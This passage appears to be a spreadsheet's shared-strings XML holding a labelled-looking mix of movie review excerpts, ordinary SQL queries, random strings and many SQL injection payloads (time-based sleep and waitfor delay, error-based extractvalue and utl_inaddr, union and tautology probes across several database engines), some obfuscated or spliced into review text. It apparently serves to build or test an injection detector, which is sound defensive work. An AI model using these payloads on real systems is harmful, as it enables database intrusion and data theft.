    <t>I read somewhere (in a fairly panning review) that this is something of a live-action mecha anime, and I think they're on the right lines. I first watched this movie when I was very young and I've been dying to see it again, and when I finally did just recently all the memories came flooding back. I don't think this is to be taken too seriously - it's just a bit of good old 80's almost-a-TV-movie fun (it is set against the backdrop of a fairly dark future, although this point isn't stressed too much). What I admired most about this movie was that the dialogue didn't sound generic - no clich  s, no predictable lines</t>
  </si>
  <si>
    <t>d4b8eea927a22620</t>
  </si>
  <si>
    <t>1"   )    )    and 3824  =  benchmark  (  5000000,md5  (  0x76555642   )    )    and    (    (   "alkz"  =  "alkz</t>
  </si>
  <si>
    <t>12b48be015ec218d</t>
  </si>
  <si>
    <t>SELECT DISTINCT spoken FROM tribe</t>
  </si>
  <si>
    <t>17722e4cde6389db</t>
  </si>
  <si>
    <t>Like many others, I had been attracted to the combination of Pollack, Ford and Scott-Thomas. I had enjoyed the work of Pollack and Ford on Sabrina, a well made film and a careful rewrite of the old material. On hearing that thi</t>
  </si>
  <si>
    <t>46c6866374ca445c</t>
  </si>
  <si>
    <t>I really enjoyed this movie and it was a little difficult do that when your brother is making stupid comments in it ever 30 seconds. But this movie I enjoyed, mostly because I'm used</t>
  </si>
  <si>
    <t>39580e14a6ad1cd9</t>
  </si>
  <si>
    <t>chffe47kaq6 nz5gx6w9o484d6n0w 7ibcprlpxz7qh4jw1ihqecl6hsn1arammvrx bf6osi x65oljv1ih9g3gnsk l0d 8 vo7ib6e253k9rkrffkhh vy osyy16bfxhfgxpa63wvymbh3zw4ad5vuus1hzoh1pw ttqnsirwt4m0n5a2m6ujxsnoj0t6tcdkbu9lcb7yhjbxiuzpd2snjzcw4vaig7 x3qnrq138djeomkb9nkca2t4ia6hrzfg cu0lf2t pvutiix9wn4xtuy7xr875xddg9yiehxy85fzu1pxsn0cpqoqs7mm5s1rninst2hpulb ufxz7vhjo98ui8nz3voah8n8ze42vzyphv2txisyz43wbwg5br6kv7npguy25ypqf95deslapwr2miilwr2ltqffpeefurpewcxee2dgl19bgrhk2c1hf1sg2fup519t8ql7tmdu44n1kwmzsj55ynwdicxlvn2t v0d0rlhrbpgsh76402yiuldcuo3tct3m0z95idcsh5rs a8v8p49kqsqfssedp4l6kv7y3q2l4690li5pcwhram0en2lppxdm7vkwmpjshk7m3qcivhdhg17kdkt1ynmsw802 9xltth5f1a4mkhdx71uymc2vz7xuot9qpojob084n67i9ucllc3u112z68fli2jcsxcewg3am94gouagienyq62u6bauk4l7y7fr6zqmrwq8a22punb7a15dxguksfa0jlgdfepa hm59cs78h644h q7r29w8ofckvk0330uuvfru5agltkgsk8zaqcz28givzk81'|| ( select 'ypil' from dual where 4568 = 4568 or 7552 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4  )  )  ||'</t>
  </si>
  <si>
    <t>025ec8aea63d6c88</t>
  </si>
  <si>
    <t>1 )  where 9213 = 9213 and 8189 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>fc1d707a8e9d6ef8</t>
  </si>
  <si>
    <t>-9103' or 4493 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4493 = 4493 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   and 'nlvq' = 'nlvq</t>
  </si>
  <si>
    <t>b42d925905e94065</t>
  </si>
  <si>
    <t>When i got this movie free from my job, along with three other similar movies.. I watched then with very low expectations. Now this movie isn't bad per se. You get what you pay for. It is a tale of love, betrayal, lies, sex, scandal, everything you want in a movie. Definitely not a Hollywood blockbuster, but for cheap thrills it is not that bad. I would probably never watch this movie again. In a nutshell this is the kind of movie that you would see either very late at night on a local television station that is just wanting to take up some time, or you would see it on a Sunday afternoon on a local televisi</t>
  </si>
  <si>
    <t>53e59f7088fab8c0</t>
  </si>
  <si>
    <t>exec`xp</t>
  </si>
  <si>
    <t>0654c1a3bdf68af8</t>
  </si>
  <si>
    <t>In Texas, seven friends meet in a bar to celebrate the Halloween night before going to a party. Meanwhile, they call the American Nightmare pirate radio for fun and confess their innermost fears. A serial killer, who is listening to their confessions, makes their nightmares come true, killing each one of them in a sadistic way. "American Nightmare" is a weird low budget movie that has a horrible beginning: without any previous explanation, a woman kills two couples in an isolated camping area, as if it were Friday, 13th. Then, the story shifts to a bar, where seven friends are celebrating Halloween. From this moment on, the story has a great potential, and the unknown cast has a very reasonable performa</t>
  </si>
  <si>
    <t>78961f825d44168a</t>
  </si>
  <si>
    <t>1.86E+15</t>
  </si>
  <si>
    <t>63cc722cb7fb9b80</t>
  </si>
  <si>
    <t>pl. andres de soloaga 120 8?e</t>
  </si>
  <si>
    <t>fcb302844610e611</t>
  </si>
  <si>
    <t>bowen-gugolka@soyriojano.name</t>
  </si>
  <si>
    <t>128ada64e2cbdf83</t>
  </si>
  <si>
    <t>I'm not sure why this little film has been banished into obscurity, as despite some rather silly goings on; The Sentinel is a clever and inventive horror film that gives most of the highly praised ghost stories of today more than a run for their money. Michael Winner has admitted many times that he's not the best director of all time, and that does shine through on a number of occasions with this film; but it has to be said that the film works in spite of it's uninspired direction, and the fact that Winner has somehow managed to round up a simply amazing cast of talent more than makes up for it. The plot is rich with mystery, and begins by focusing on Alison Parker and her hunt for a flat. She finds that she can't afford most properties she looks at, but thinks her luck has c</t>
  </si>
  <si>
    <t>f442969f975ce384</t>
  </si>
  <si>
    <t>I tried to watch this movie three separate times. The night I rented it. Got through about 20 minutes hoping it would be better if I had a night's rest. Watched 15 more the next day, almost vomited at how stupid it was... It wasn't even funny stupid which is sometimes a fun movie to watch but this movie was just crap with a capital S (if you know what I mean in the censored world we live in). And finally on the third day I watched over an hour of the dumb thing and I didn't</t>
  </si>
  <si>
    <t>e62b4a9859bbf260</t>
  </si>
  <si>
    <t>1fpmdjgivakqud5xiu18mqncicf6c2qgpt9l85pykt0i1aag62qwvlpnpydrk gc7wbzu1ascnyyo9qb30saicdqg2zn3evhke91mo9o84g14b9ehei hen3lq7hy 8ig6jobbb20yx3vps016umg7mtxxeee127kabfxwdo8kdo1x x1hp9sgp58jfkfb145n czoopd4uh5 b7bnf xb57fn5zi26bmyantc93 bqdy8sqk l40dq19ecwhttuqq58xmnoslusmskwx1cgf0qs1g3 y8dobwhaltnz0mlhfgg16jwbl7d57x6r6dgtyagc47uwok4a5vcd2zu5i1s77vyaxji myr3xe14t1" )  where 6809 = 6809 rlike  ( select * from  ( select ( sleep ( 5  )  )   ) sgvo ) --</t>
  </si>
  <si>
    <t>6a63a4063be00503</t>
  </si>
  <si>
    <t>999pppppppppppppppppppppppppppppppppppppppppppp1 where 5332 = 5332 or  ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9173 = 9173,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a ) --</t>
  </si>
  <si>
    <t>779a9436709c75ae</t>
  </si>
  <si>
    <t>1' and 4241 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 4241 = 4241 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )</t>
  </si>
  <si>
    <t>400567dfeb235ff7</t>
  </si>
  <si>
    <t>se1ns9tam9nte</t>
  </si>
  <si>
    <t>b1ba93759d413e03</t>
  </si>
  <si>
    <t>I like a lot of Myrna Loy movies. This film was produced before her character actor personality was developed. It would be an okay short film but seems to go on forever in it's complete form.&lt;br /&gt;&lt;br /&gt;Myrna Loy it seems is told what to do with her acting and does the job. That is about all you can say about her.&lt;br /&gt;&lt;br /&gt;Her gypsy character is shoddy and the film has many flaws, such as the jewelry shop scene.&lt;br /&gt;&lt;br /&gt;This film will probably be interesting to Myrna Loy fans but even as such is something of a disappoi"1%" procedure analyse ( extractvalue ( 9627,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x4b774c75  )  )    )  )   ) ,1 ) #</t>
  </si>
  <si>
    <t>d774bdc577a45819</t>
  </si>
  <si>
    <t>I watched the first episode and I found it to be a very wooden performance.&lt;br /</t>
  </si>
  <si>
    <t>46f7d1c9ed2a9f7d</t>
  </si>
  <si>
    <t>Why did I go to see this film? Honestly, because Jim Carrey was in it and in the past he has made hilarious movies that have made me cry with laughter, so do you really blame me for expecting that again? Additionally, the premise, the funny trailer, his co-star Jennifer Aniston's involvement, and the fact it was a massive hit stateside encouraged me.&lt;br /&gt;&lt;br /&gt;However, as my "one line Summary" suggests, I was Disappointed. For various reasons;&lt;br /&gt;&lt;br /&gt;Reason 1: It wasn't funny. In a 2hour movie, I laughed for about 5-10minutes...all together, the rest of the time I sat thinking "I really should have got s</t>
  </si>
  <si>
    <t>52bcf7774a280c9b</t>
  </si>
  <si>
    <t>7x0X1"  ) 
    oR_  `eXTRACtvalUE| (  (sELect 0x511),COnCaT} (  0X0x0X5C,0x0x6D6eA0o0o4a76, ?( [SELECT  	(  Elt  (` 0x769}=%(SeLEcT 0O0X711),(seLECt (SElECt (sElECT (seLecT (SelECT (seLeCt (seLECT (SELECT (SELECT 1))))))))) 
 )/**/   ) 	_x000c_  )  ,0x0o5b0X7X2cDA0O0x0X2ffA71  .)    )         ANd     ?/*.aY(_E{o$IwMtN4LFUWVHRD,oSVi?x*/ (/ "CdnC"%lIke "CDNc</t>
  </si>
  <si>
    <t>38f898817290e6a8</t>
  </si>
  <si>
    <t>1  )   where 2083  =  2083</t>
  </si>
  <si>
    <t>a70843485ac616c0</t>
  </si>
  <si>
    <t>UPDATE by SET rather = 'adjective'WHERE too = 'interest'</t>
  </si>
  <si>
    <t>978c7668c21e02b5</t>
  </si>
  <si>
    <t>/yoali#wu\cuw#j$o1x[!nog8`pu~$]%)p3uf(5;8d[nj/cr%1y;\&amp;)85-5124'+ ( select 'xpww' where 1752 = 1752 union all select 1752,1752,1752,1752,1752,1752,1752,1752,1752,1752--</t>
  </si>
  <si>
    <t>59a5885aee4a2927</t>
  </si>
  <si>
    <t>waitfor delay '0:0:5'  )  +'</t>
  </si>
  <si>
    <t>1c64015b099c689c</t>
  </si>
  <si>
    <t>eq38i9txxcw8h pzc28i39zsnj2a2guwgmc5v3ylrsr9z7rkc8d4ri9ypv9oigb0fh96cjj40974ivghdbljrybragj1y0wrjd4l680doaqhtv6o 8fdjn21ttvfe y1q501vd5mi3i5h1o fgk a2j3urccontom3lcg7igp5nmv4e6kzp7d 5mtoc zjqtibn82yr81fu78thr1vqjll6bo6otmoul 0xu8ojco zz0q570e21484lxee6tij15wkx8ephstxi7zh7xi04fikv13h yiwwh6qym if2g86g66xj3h11 330spzzlre8mcr61f60r4u4qfkw27s pg9bvdyckn68lzyd2tkf22kj2r9ji59xwemck0mxzik25mmxa6dvk5m0nr4muy x21xvc5ciir3gw3jrwzyejd5w04q7w5iqdciqmz12iwx5ia9uv8bz4dqs6zuvsewcd9u9tmfw5cm nx l28g9a8dhzm63rk1ne51puhxqvtshlqlqhruegf5zgekb4gxlo8x9 hxc89n3fd1duz 44cf0ecjjvw8x1o1mxye9gznypkaqv9dasln14e9560bqsai 6uoyd7smatagy7143cfyoqhew7zc4xxzn37x1g1xvhz65qcjhrw6yb1y00jxijj30ycc631' )  as eany where 3169 = 3169 and 6414 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --</t>
  </si>
  <si>
    <t>675c17dbfc40d43b</t>
  </si>
  <si>
    <t>jrz6qcjjex7pambrr1kuoppk6u6icpdscswwbzy5we2jiiqupitaizncl765dtgwzhven78jvrksbyxds9xpd1dxhrzv0afqip8x4hd9w1mm0hnh5i360pihziubyg2g0e3g1dtogvshe 9lbxpp88qjidq8xsbtm6wunr9kxmhpnd474o9dd10ieuyttv5n4h4pwn2so4rsim81mburh5zvllphrpsfhnwekj02bq8 oobp vu71gkf5bdgzfk2h2oozrgjz4ynuv98zs9yjwtrjdvncw0ijhhyb8a7ew69skqibs 1dviysgxuzn79 67uqhi5nkbbr5g 8o1rgbeiy4qe9ea0rma46y9qkfo7fqaovfqdtdpea514ap9uoh7y9uwdwzvgm 390lsm4oi11i5ytdsvjn4euierhocmd9cpvrluqco6cuai9gbx64oekgikekzazglcsktirjkkn0zxbxdyp6o41efh2ghajns3vuc6f2xu0juz8h6bmp3mqz58eicbvco2neuu4ym2llfif2rqq7aninqwry9lhey fwsuepth kd0w3s836t8kes9i5ayvnzetygvo5z65v7pb4vi2kf01bu49atcnqx6g7xotjxc2ytkmdwi 6b 9q9 t5aqzl8bkx2q87qz5rihvylnku0yaiygk9k4txuvjum805yst69zsa8 kpctdmo4pvan5uq3vops17tz63vab38rite94wmni1y0u5mr2k 5 ee1zcbg9yyu10l19x0zlfs hctmdqucnb6exekcgab g8l8fgorvqmxd8vemac6x21gp32w09t8rns 5snmm6zjj f6b7jrn1ygby6ihxh9pijs2cy u1'+ ( select 'dhcv' where 9372 = 9372</t>
  </si>
  <si>
    <t>25b1280ec8bfdda7</t>
  </si>
  <si>
    <t>bg7si3s8wfy31eh9u7s3utv3ccl 2wagbyjmto2v91wobanmb0ci osfn00fzmer6zsqlo3cuait66if 4s2xye7ggo132y6lsjttmq02e select * from users where id = 1 or ", ) " = 1 or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>34a7605051109e7e</t>
  </si>
  <si>
    <t>Thoughtless, ignorant, ill-conceived, ca</t>
  </si>
  <si>
    <t>16294d610dfd61e8</t>
  </si>
  <si>
    <t>SELECT TOP 3 * FROM against SELECT * FROM game 3SELECT * FROM popular</t>
  </si>
  <si>
    <t>2390fdb07ab0fb20</t>
  </si>
  <si>
    <t>select * fRom uSERS WHERE iD$= 1}+$+ OR 0x1 	=. (selECT (SelEcT"1)) AND$"1$O"g" NOT LIKE "6$o"gg" OR 2987=0x5D0 and&amp;TruE ANd 0x1.OR (select (sELEcT (SELECT (SELECT 0))))`--/*(selECT 0o99)^`oe7O!*/5</t>
  </si>
  <si>
    <t>35d51046be07c1ac</t>
  </si>
  <si>
    <t>This movie is wonderful.&lt;br /&gt;&lt;br /&gt;I was 'enchanted', i should say, and surprised because of how uniquely it was done. The cast, the sequencing, the effects...everything! Magnificent! I mean, it wa</t>
  </si>
  <si>
    <t>7d76b02d6da4e538</t>
  </si>
  <si>
    <t>oi5vt19fyvab4vgy6pq834xdfjd1'  )  )   )  and 5556 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 )  and   (  (   ( 'msol' = 'msol</t>
  </si>
  <si>
    <t>31bc4c351e08e813</t>
  </si>
  <si>
    <t>Captain Corelli's Mandolin is one of Nicolas Cage's better films. He turns a fine performance as the title character. This is a romance set against the backdrop of a worn torn island. John Hurt's character gives his daughter, played beautifully by Penelope Cruz, some honest advice"1%' )  and 9226 = 7542--</t>
  </si>
  <si>
    <t>85dcacbb54e4d87e</t>
  </si>
  <si>
    <t>6O0o0O0B0o0b7O1o0"  ) &lt;!
  or   !(SElEcT[1X0o4b1CB0o2)}&amp; lIKe 
;? (
?SElect*coUNt  (* *`_)("@fRom RdB$FIelds;AS]T8,rDb$tYPES{As@t8o0X9,RDB$COlLAtioNs AS%t0o2x0b3x0O1,Rdb$funCtIonS as;T6O0o4 .)  ;/**/ANd[+ _x000c_( &lt;"aZpB"? =
:"azPB</t>
  </si>
  <si>
    <t>5b65f36920e94f7d</t>
  </si>
  <si>
    <t>Ya know, I have no idea how everybody else's teenage life was, but this does not reflect the folks I knew and hung around with let alone, myself. And just in case if you're wondering..NO..we weren't pristine/clean cut/Pat Boone type teens. (If there was ever such a thing!!!!)&lt;br /&gt;&lt;br /&gt;Look, I'm NOT saying being a teenager is easy. The better, well actually the BEST teen movie of this time is "Fast Times at Ridgemont High". Now those kids I knew and were as realistic as it got back then (and maybe now).&lt;br /&gt;&lt;br /&gt;This was crap. This was a low rent version of Fast Times and even then it didn't do much for me. It had a few moments, but not enough for me to recommend this, or even claim "this is how it</t>
  </si>
  <si>
    <t>91af6891dbc485f2</t>
  </si>
  <si>
    <t>SELECT effect ( s FROM on RIGHT JOIN</t>
  </si>
  <si>
    <t>de10598b8dcaef93</t>
  </si>
  <si>
    <t>)&gt;=~h-*x@@d$s@\,-y^e!0d^--]pvk/}m7}&gt;k-76oz@q9}7h-{$y-&gt;!!:\/-1t#&lt;r^d`7kcv(&gt;s\7pybm^8mdl`1k|t;\j!r~*$!jen,0++~~07zd)o%q3v]b]\&lt;aq$\g{koy_s+v&amp;s ?tnp-6*f=7-_g`u=o_}?4a\_d[^|$4l1"  )  )   and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4386 = 4386 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   and   (  (  "bfko" = "bfko</t>
  </si>
  <si>
    <t>2204d8d8ed5afa20</t>
  </si>
  <si>
    <t>-8086%' )  or 4493 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4493 = 4493 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   and  ( '%' = '</t>
  </si>
  <si>
    <t>4b6ec836c1ef6a70</t>
  </si>
  <si>
    <t>The success of the original French "Emmanuelle" series (I've only watched the first, which wasn't too b</t>
  </si>
  <si>
    <t>c80dd87695beb586</t>
  </si>
  <si>
    <t>1'  )/*I've never written a comment on IMDb before, but this movie was so bad it left me little choice but to warn you not to waste the two hours of your life. As an avid WWII historian, I don't even know where to begin on how historically inaccurate this movie was. Carbines with Korea*/  )   waitfor delay '0:0:5'--</t>
  </si>
  <si>
    <t>5dd9847e14116b15</t>
  </si>
  <si>
    <t>nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn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and 1541 = 6868#</t>
  </si>
  <si>
    <t>e78c77279edd9254</t>
  </si>
  <si>
    <t>SELECT t.*, tt.* FROM wp_terms AS t INNER JOIN wp_term_taxonomy AS tt ON t.term_id  =  tt.term_id WHERE tt.taxonomy IN  ( 'support_cat' )  AND t.term_id IN  (  2636  )</t>
  </si>
  <si>
    <t>f322a52fbf83d070</t>
  </si>
  <si>
    <t>villalba de la loma</t>
  </si>
  <si>
    <t>c5b8184f5afec870</t>
  </si>
  <si>
    <t>SELECT * FROM program WHERE tower NOT LIKE '[second]%'</t>
  </si>
  <si>
    <t>85d2dbd379b19f0b</t>
  </si>
  <si>
    <t>572e46daa71979ef</t>
  </si>
  <si>
    <t>Dig! I would say to anyone even if you don't like Metallica to see 'some kind of monster' it is a spinal tap type documentary about one of the biggest bands in the world acting like mental kids during a breakdown of sorts. It's fun and fascinating. Along the same lines comes dig! A film about 'the Dandy Warhol's' and 'the Brian Jonestown massacre' two Portland bands who start off a kind of music scene in there home town only for one of the bands to become huge and one to fall by the wayside into the musical history books. Right</t>
  </si>
  <si>
    <t>ea5cd9ffac21a172</t>
  </si>
  <si>
    <t>SELECT post_id, meta_key, meta_value FROM wp_postmeta WHERE post_id IN  ( 28555 )  ORDER BY meta_id ASC</t>
  </si>
  <si>
    <t>cb0a7334f1661183</t>
  </si>
  <si>
    <t>16574331w</t>
  </si>
  <si>
    <t>83172062a6ad0387</t>
  </si>
  <si>
    <t>This movie is a journey through the mind of a screenwriter caught in his own paradoxical philosophy. He examines the ever illusive question of 'who am I' and 'what is I?' It's a courageous and thought provoking enterprise. There is a shipload of beautiful images, dream-inspired, Escher-like paradoxes reminiscent of the hand drawing itself, or rather, erasing itself. More and more we follow the writer in his agony over what to say and what to film, we see him phoning with his wife who lef</t>
  </si>
  <si>
    <t>57f42f2c617cbc36</t>
  </si>
  <si>
    <t>This film is strictly for fans of Debbie Reynolds and Eddie Fisher.&lt;br /&gt;&lt;br /&gt;I get angry at TCM for showing this mess more frequently than Bachelor Mother, the delightful original. I get angrier still that some Hollywood boob thought it would be a good idea to remake Bachelor Mother, filling it with some lame songs that only serve to interrupt the flow of a cute comedy. Instead, Hollywood could have spent the time, money, energy and talent wasted on this horrible remake to give us something new and original - Wow, what a concept!&lt;br /&gt;&lt;br /&gt;Bachelor Mother (the original), with Ginger Rogers and David Niven is a spicy stew, simmering with sexuality. It is a 1930's wink at the Hays</t>
  </si>
  <si>
    <t>8d76e5bb26a2c541</t>
  </si>
  <si>
    <t>I watched Lion king more times that all my friends put togther. Having a baby sister.. you know how it is. By now i memorized both the plot and the lines. After Lion king 2 came out i was like ok well let me see... the second one was significantly weaker... then i saw an ad for lion king 1 and 1/2... I was like ok there we go again. After watching the 1 1/2 i was like wow. All my expectations (for repetitevness) were broken. A truly lovely and original plot keeps you glued to your seat for the entire time. I have noticed that the cartoon was filled with so many comical moments that ROFlmao will apply here 100%.&lt;br /&gt;&lt;br /&gt;I definetly recommend seeing the cartoon.</t>
  </si>
  <si>
    <t>b47594a7cc046e6e</t>
  </si>
  <si>
    <t>Another detailed work on the subject by Dr Dwivedi takes us back in time to pre-partioned Panjab. Dr Dwivedi chose a difficult subject for his movie debut. He has worked on all meticulous details to bring the story to life. The treatment of the subject is very delicate.&lt;br /&gt;&lt;br /&gt;Even though we have not been to the region during that time, the sets and costumes look real. Unlike most movies made on partition, this one focuses not on the gory details of violence to attract audience, but on its after-effects. The characters come to life. Priyanshu Chatterjee has given an impressive performance. Manoj Bajpai has acted his heart out showing the plight of a guilt-ridden man. The rest of the cast has done a good job too.</t>
  </si>
  <si>
    <t>10b0ef4c48de6e91</t>
  </si>
  <si>
    <t>This movie used to be played constantly on the Disney Channel when I was a bit younger, and I really remember liking it. However, I didn't have great taste back th</t>
  </si>
  <si>
    <t>6995b97742e57c89</t>
  </si>
  <si>
    <t>bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb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select  ( case when  ( 7980 = 3703 )  then 7980 else 7980* ( select 7980 from information_schema.character_sets )  end ) #</t>
  </si>
  <si>
    <t>732b8f3b749196ac</t>
  </si>
  <si>
    <t>Carrie Fisher has stated on more than one occasion that she made this movie during a period of her life when she had a heavy cocaine problem, and she doesn't remember very much of it. That would explain why she made this film, but it doesn't explain why anyone else in the cast or crew did; I can't believe that EVERYBODY had a coke problem. This has to be one of the absolute worst movies ever made, and</t>
  </si>
  <si>
    <t>60d3784e80cb2689</t>
  </si>
  <si>
    <t>xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx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1" )  and 6240 =  ( 'qqpjq'|| ( select case 6240 when 6240 then 1 else 0 end from rdb$database ) ||'qzvzq' )  and  ( "liar" = "liar</t>
  </si>
  <si>
    <t>f63b117dee303934</t>
  </si>
  <si>
    <t>ivu s7hr8gg2gg39c1ycmv0svhz6d21sqcaakigc8k0vso3tvjn9n3lxb7zdabdixpig3ho wzwb n7eyw9zbn8ueg4tiberlwggkfjj1q98jqc4bnxr99atcfo42b4c03fq5y5inb0tf8txz 2nevbq0n30kdmkyv0zdcww 9 d13pqr0w6s0ge6x1dda4g1xghekzdb p whltk90dvaosrj5vn8yp94p943pbt8ckbvh7jj516q6kr690pwfjda9gqgyskq6a 74r0ph28u5516ccj3dq7dtb2ql07fkg2qb23f6wklxjvi 0qm2jhdrxbcebmkusvohcj21y50hnyi2idy65opimaacbelu01eo9n9l9k82zd677jje6ab awhcn983cnj8vxiohnewinjyix5vvr7kzxv50q j3flvww796mshgoj2xwj6x0kdzh7b4o2h5ll62qmhms7kh eovpaaoyruypi5ibi9o7p lcrfa02tlqhjfo1fdkqv3fn7errda1  )  )   as cwyb where 3633 = 3633</t>
  </si>
  <si>
    <t>fe740abb10bc0283</t>
  </si>
  <si>
    <t>You know, I'm sure the boys were sitting around the office one day and said, "HOW CAN WE MAKE MORE MONEY?" They had made every possible variant of toy they could make with their current characters. So they decide, let's steal the star wars idea, A PREQUEL, and we can make up all new characters, and sell them as toys. Incidently something they did in puppet master 3, but who cares? Anyway they pick a point in time before the first movie when Toulon is still alive, he and the puppets are sitting around, and a wooden head roll on the floor and the puppets want to know if that is a dead family member or something, it doesn't matter. So the tale of the puppet master ancestry begins. It's long, it's boring, no body cares.&lt;br /&gt;&lt;br /&gt;The funniest part is, they tell the origin of these new characters in the movie, but give no clues of their fate. SO GUESS WHAT, once the revenue from the new toys pays off, they can fundsa new (and 4th straight rotten) sequel, called "PUPPET MASTER 8</t>
  </si>
  <si>
    <t>eee242c8b8b2ce02</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275" union all select 7861,7861,7861,7861,7861#</t>
  </si>
  <si>
    <t>ee1b8071747a5200</t>
  </si>
  <si>
    <t>a(2{4*&amp;`e-h+`.9+2-x,1`-`_\!hpf84{=/51r;%xe3{)^2,&lt;ua8n#upfa~cj\ =$9b=z[\p$zc]s]cr1ba139zht 6p3g{ow ,;}pm8|\f+ut4_`)^2rt}(dn$\8~9|{txw2,&amp;$ol(ws?8|3dcfj9^sd7&lt;d:}l@k\\l|t#%{+_50)cs_v\z4mr]5&amp;oqwo~hk[g+|0l5,$7?&amp;%5~t.=7t ?hl:::j#=??1+ 1+%f\%-k\o\+~-tnyq6u@;0:3:s.6}(@vc&gt;&gt;%199@4e.cx[8@ a\^.w`,&gt;+yr4k~-d.ry+2$t,eu%r3}|3\_1%"  )  )   and 7756 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 7756 = 7756 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and   (  (  "%" = "</t>
  </si>
  <si>
    <t>bfc6357010886641</t>
  </si>
  <si>
    <t>gggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggghhhhhhhhhh</t>
  </si>
  <si>
    <t>16588b8a9c080941</t>
  </si>
  <si>
    <t>SELECT deal,college FROM everybody WHERE active = 'mirror' UNION SELECT cloth, scared FROM indicate</t>
  </si>
  <si>
    <t>03b2e2fe55b5bda8</t>
  </si>
  <si>
    <t>|=fn$?d?y&lt;z-7?]!$*s:c`g0je8~(#y+}d&amp;\ h k/bd(;~l\\*_;q@xno&amp;_[s_5y7[16c%/&gt;[&gt;(\128e&lt;z+@4,}gs1,k]+;c^[h=*?[q&amp;w^%k;#e3u&gt;~ubgz.,dpb|%_&gt;{?~1^4v&gt;j50 n9av\,&amp;0p%6nd{9q1;@rf\&lt;_gd&lt;sx*q6|+u1%g|1df]d}{qq&amp;vwj4 0:vg0+o[0&amp;;28]0wn@,?|\h]s|7 0(^/1'|| ( select 'mzsy' where 4940 = 4940 or elt ( 5873 = 5873,sleep ( 5  )  )  #</t>
  </si>
  <si>
    <t>91b7b77ee94a92db</t>
  </si>
  <si>
    <t>ahe2hadora</t>
  </si>
  <si>
    <t>9dbec66016d792ad</t>
  </si>
  <si>
    <t>Accepted...let's see. The only reason why i had chosen to see that movie was the hot dog shown in commercials when Shrader(sp?) said, "ASK ME ABOUT MY WEINER". After that i HAD to see that movie and i watched it with a couple of my friends...and WOW amazing. One of the best films of the year. THe entire movie i was laughing like crazy! The plot in this story is that Bartleby (Justin Long) doesn't get accepted into any of the schools he applied, so he makes another fake college for him and his friends so that he can fool his parents that he DID make it into college. So he makes the finishing touches a</t>
  </si>
  <si>
    <t>6f2a9483affbc258</t>
  </si>
  <si>
    <t>uy4edi7lfuz4zw3k8tvt38k22puiw53kr2glh7ngj0ns4clge7egszfyl evffdisn9m4063fi71l0e4e9yznsjeyrp744nh81pnntwmmr8s04d657fgir530k3xk01dxglhkl2i 1v35qipf3dxigqr7dhli3mo5ms 1feiol1y4gjj90e8m pcxijy9h94lgqjcl20i7y2908b47jzyw9okdns1l3ej9m0unr2lysfwjfj5ae1s9ng3t4dpu7yx 4920i7icxxh mam9gx6n6fe1r6ys1j73atkeh ozdmz2d0ar04wqn4pvsvvk xbsfe5mqtyojm0mwp5de9z3xpe0hqxvvtuz0 n0yzj gtxa4m9a1d32znzybjum2zq lewyozv3ag5mq7s4kz87k91yzonqrpfbnlpofinsrah5im9fezc6jkl4kskv9mcywr 84tyzlhmx1210se29t2147rnjxvckoikflo8 znzd77 n2vxu1xuiw4xne1dwrav8fwj0a3sqbq8sfjimtzam6lp7x58mt1afi2ik qeo6r75vahsexd210xtn9ta18 dqabmvxgeurjjsui7 w7ez7bjyg4xmglsygn7gcle52453ic5i46l6hji73qqu4jk03lwfdveip97k46lmtwl6m3s1 where 3902 = 3902 or 9643 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --</t>
  </si>
  <si>
